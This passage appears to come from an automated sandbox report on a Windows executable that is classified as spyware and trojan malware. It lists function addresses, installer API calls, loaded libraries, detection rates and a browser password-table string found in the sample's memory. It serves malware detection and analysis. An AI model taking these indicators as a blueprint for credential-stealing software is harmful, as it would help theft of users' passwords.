            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD54A02_2_3AFD54A0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD22A02_2_3AFD22A0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD38802_2_3AFD3880
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD06802_2_3AFD0680
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD6A802_2_3AFD6A80
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD6A712_2_3AFD6A71
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD4E602_2_3AFD4E60
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD1C602_2_3AFD1C60
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD64402_2_3AFD6440
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD32402_2_3AFD3240
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD00402_2_3AFD0040
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFDEE382_2_3AFDEE38
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD64302_2_3AFD6430
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD48202_2_3AFD4820
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD16202_2_3AFD1620
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD5E002_2_3AFD5E00
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD2C002_2_3AFD2C00
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD41E02_2_3AFD41E0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD0FE02_2_3AFD0FE0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD57C02_2_3AFD57C0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD25C02_2_3AFD25C0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD6DA02_2_3AFD6DA0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD3BA02_2_3AFD3BA0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD09A02_2_3AFD09A0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD51802_2_3AFD5180
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD1F802_2_3AFD1F80
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD67602_2_3AFD6760
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD35602_2_3AFD3560
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD03602_2_3AFD0360
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD4B402_2_3AFD4B40
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD19402_2_3AFD1940
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD61202_2_3AFD6120
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD2F202_2_3AFD2F20
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD45002_2_3AFD4500
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFD13002_2_3AFD1300
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE3FE82_2_3AFE3FE8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE61E82_2_3AFE61E8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE9FFF2_2_3AFE9FFF
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE1FF82_2_3AFE1FF8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEB7F82_2_3AFEB7F8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE48F72_2_3AFE48F7
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE74F72_2_3AFE74F7
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE0DF02_2_3AFE0DF0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE8CF02_2_3AFE8CF0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEE2EF2_2_3AFEE2EF
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEB7EA2_2_3AFEB7EA
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEFAE82_2_3AFEFAE8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE1FE82_2_3AFE1FE8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFECFE02_2_3AFECFE0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE8CE02_2_3AFE8CE0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE0DDF2_2_3AFE0DDF
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEFADF2_2_3AFEFADF
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEA4D82_2_3AFEA4D8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE61D82_2_3AFE61D8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE3FD92_2_3AFE3FD9
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE04D02_2_3AFE04D0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE79D02_2_3AFE79D0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFECFCF2_2_3AFECFCF
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE36C82_2_3AFE36C8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEE7C82_2_3AFEE7C8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEA4C82_2_3AFEA4C8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEBCC02_2_3AFEBCC0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE79C02_2_3AFE79C0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE04BF2_2_3AFE04BF
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE56B82_2_3AFE56B8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE91B82_2_3AFE91B8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE36B82_2_3AFE36B8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEE7B92_2_3AFEE7B9
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE66B02_2_3AFE66B0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEBCB02_2_3AFEBCB0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE91AA2_2_3AFE91AA
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE2DA82_2_3AFE2DA8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFED4A82_2_3AFED4A8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE56A82_2_3AFE56A8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEA9A02_2_3AFEA9A0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE66A02_2_3AFE66A0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE2D9A2_2_3AFE2D9A
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE4D982_2_3AFE4D98
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE7E982_2_3AFE7E98
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFED4982_2_3AFED498
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEEC902_2_3AFEEC90
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEA9902_2_3AFEA990
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE24882_2_3AFE2488
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEC1882_2_3AFEC188
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE4D892_2_3AFE4D89
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE7E872_2_3AFE7E87
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEEC842_2_3AFEEC84
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE12802_2_3AFE1280
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE96802_2_3AFE9680
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE247A2_2_3AFE247A
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE44782_2_3AFE4478
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE6B782_2_3AFE6B78
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEC1782_2_3AFEC178
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFED9702_2_3AFED970
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE12712_2_3AFE1271
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE966F2_2_3AFE966F
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE6B6A2_2_3AFE6B6A
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE1B682_2_3AFE1B68
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEAE682_2_3AFEAE68
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE44692_2_3AFE4469
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE09602_2_3AFE0960
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE83602_2_3AFE8360
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFED95F2_2_3AFED95F
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE3B582_2_3AFE3B58
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEF1582_2_3AFEF158
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE1B582_2_3AFE1B58
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEAE592_2_3AFEAE59
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEC6502_2_3AFEC650
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE83502_2_3AFE8350
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEF1502_2_3AFEF150
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE094F2_2_3AFE094F
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE5B482_2_3AFE5B48
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE9B482_2_3AFE9B48
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE3B472_2_3AFE3B47
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE9B422_2_3AFE9B42
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE00402_2_3AFE0040
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE70402_2_3AFE7040
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEC6402_2_3AFEC640
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE32382_2_3AFE3238
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEDE382_2_3AFEDE38
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE5B372_2_3AFE5B37
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE70322_2_3AFE7032
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEB3302_2_3AFEB330
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE52282_2_3AFE5228
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE88282_2_3AFE8828
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE32282_2_3AFE3228
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEDE282_2_3AFEDE28
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEB3222_2_3AFEB322
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEF6202_2_3AFEF620
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE29182_2_3AFE2918
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFECB182_2_3AFECB18
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE52182_2_3AFE5218
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE88182_2_3AFE8818
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFECB122_2_3AFECB12
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE17102_2_3AFE1710
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEA0102_2_3AFEA010
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEF60F2_2_3AFEF60F
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE49082_2_3AFE4908
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE75082_2_3AFE7508
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE00072_2_3AFE0007
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE29072_2_3AFE2907
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFEE3002_2_3AFEE300
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AFE17002_2_3AFE1700
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00F9882_2_3B00F988
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B007FA82_2_3B007FA8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0018282_2_3B001828
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00F6682_2_3B00F668
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00ED082_2_3B00ED08
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0005082_2_3B000508
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0089082_2_3B008908
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00BB082_2_3B00BB08
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0031232_2_3B003123
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00D7282_2_3B00D728
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00A5282_2_3B00A528
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B008F482_2_3B008F48
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00F3482_2_3B00F348
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00C1482_2_3B00C148
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00135B2_2_3B00135B
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0013602_2_3B001360
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00AB682_2_3B00AB68
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00DD682_2_3B00DD68
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00C7882_2_3B00C788
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0095882_2_3B009588
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00E3A82_2_3B00E3A8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00B1A82_2_3B00B1A8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0009C72_2_3B0009C7
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B009BC82_2_3B009BC8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00CDC82_2_3B00CDC8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0009D02_2_3B0009D0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00B7E82_2_3B00B7E8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0085E82_2_3B0085E8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00E9E82_2_3B00E9E8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00D4082_2_3B00D408
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00A2082_2_3B00A208
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B002C152_2_3B002C15
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0018172_2_3B001817
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00F0282_2_3B00F028
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B008C282_2_3B008C28
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00BE282_2_3B00BE28
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0000392_2_3B000039
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0000402_2_3B000040
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00A8482_2_3B00A848
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00DA482_2_3B00DA48
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0092682_2_3B009268
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00C4682_2_3B00C468
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B000E882_2_3B000E88
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00E0882_2_3B00E088
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00AE882_2_3B00AE88
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B000E982_2_3B000E98
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B002E982_2_3B002E98
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00FCA82_2_3B00FCA8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00CAA82_2_3B00CAA8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0098A82_2_3B0098A8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00B4C82_2_3B00B4C8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0082C82_2_3B0082C8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00E6C82_2_3B00E6C8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B009EE82_2_3B009EE8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B00D0E82_2_3B00D0E8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0004FB2_2_3B0004FB
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B041C502_2_3B041C50
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0431082_2_3B043108
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0437F02_2_3B0437F0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0415302_2_3B041530
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B042A202_2_3B042A20
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0448DE2_2_3B0448DE
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B040E482_2_3B040E48
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0423382_2_3B042338
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B041C412_2_3B041C41
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0430FB2_2_3B0430FB
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0437E12_2_3B0437E1
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0415212_2_3B041521
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B042A132_2_3B042A13
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B040AC42_2_3B040AC4
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B040AD02_2_3B040AD0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B040E382_2_3B040E38
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0423282_2_3B042328
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0400062_2_3B040006
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B0400402_2_3B040040
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B6BB5102_2_3B6BB510
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B6B5CB02_2_3B6B5CB0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B6B1BE42_2_3B6B1BE4
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3B6B4A182_2_3B6B4A18
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: String function: 00402C41 appears 51 times
            Source: 4kobC6KGC3.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536035054.0000000037D57000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 4kobC6KGC3.exe
            Source: 4kobC6KGC3.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/14@5/5
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_00403359
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 0_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046EC
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeFile created: C:\Users\user\spinsterishlyJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeMutant created: NULL
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeFile created: C:\Users\user\AppData\Local\Temp\nsa4648.tmpJump to behavior
            Source: 4kobC6KGC3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038202000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000381F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 4kobC6KGC3.exeVirustotal: Detection: 77%
            Source: 4kobC6KGC3.exeReversingLabs: Detection: 63%
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeFile read: C:\Users\user\Desktop\4kobC6KGC3.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\4kobC6KGC3.exe "C:\Users\user\Desktop\4kobC6KGC3.exe"
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess created: C:\Users\user\Desktop\4kobC6KGC3.exe "C:\Users\user\Desktop\4kobC6KGC3.exe"
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess created: C:\Users\user\Desktop\4kobC6KGC3.exe "C:\Users\user\Desktop\4kobC6KGC3.exe"Jump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: version.dllJump to behavior
